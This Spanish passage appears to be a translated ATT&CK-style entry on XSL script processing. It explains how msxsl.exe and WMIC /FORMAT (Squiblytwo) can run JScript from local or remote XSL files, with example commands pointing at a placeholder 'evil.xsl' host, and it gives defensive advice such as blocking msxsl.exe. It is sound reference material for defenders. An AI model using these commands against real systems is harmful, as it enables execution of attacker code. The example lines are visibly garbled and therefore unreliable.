Recomendaciones de seguridad: se pueden usar firewalls y servidores proxy web para implementar políticas de comunicación de red externas. Los sistemas IDS / IPS que utilizan análisis de firmas pueden detectar malware conocido a nivel de red. Sin embargo, vale la pena considerar que con el tiempo, los oponentes cambiarán las firmas de la herramienta C2 o reconstruirán los protocolos de tal manera que eviten la detección con la ayuda de las defensas de uso común. El uso de herramientas para monitorear el comportamiento del usuario también puede aumentar la posibilidad de detectar actividad anormal.
Sistema: Windows
Derechos: usuario
Descripción: el Lenguaje de hoja de estilo extensible (* .xsl) se usa generalmente para describir el procesamiento de datos y la representación en archivos XML. Para admitir operaciones complejas en XSL, es posible incrustar scripts en varios idiomas en el código. Los atacantes pueden abusar de esta funcionalidad para ejecutar archivos arbitrarios. Similar a la técnica de abuso de las utilidades de desarrollador de confianza (Trusted Developer Utilities), la utilidad de confianza msxsl.exe, que convierte un documento XML a otra forma (html, wml, rtf, pdf, etc.) se puede usar para ejecutar JavaScript malicioso incrustado en local o archivos XSL eliminados (referenciados a través de URL). Como msxsl.exe no está instalado de manera predeterminada, lo más probable es que el adversario tenga que empacarlo y otros archivos necesarios. Ejemplo de llamada msxsl.exe:
clientes msxsl.exe [.] script xml [.] xsl .
Otra variación de esta técnica, llamada Squiblytwo, es usar WMI para invocar JScript o VBScript desde un archivo xsl. Esta técnica, como Squiblydoo, que abusa de regsrv32.exe, también utiliza herramientas confiables de Windows:
• Archivo local:
lista de procesos wmic /FORMAT:evil[..BIZxsl;• Archivo remoto:
wmic os get / FORMAT :
decidehttps [ :
-------- // ejemplo [. † com / evil [. † xsl ".Recomendaciones de protección: si msxsl.exe no se usa en el entorno protegido, bloquee su ejecución. Inhabilitar WMI por el contrario puede conducir a la inestabilidad del sistema y, por lo tanto, requiere una evaluación preliminar de las consecuencias.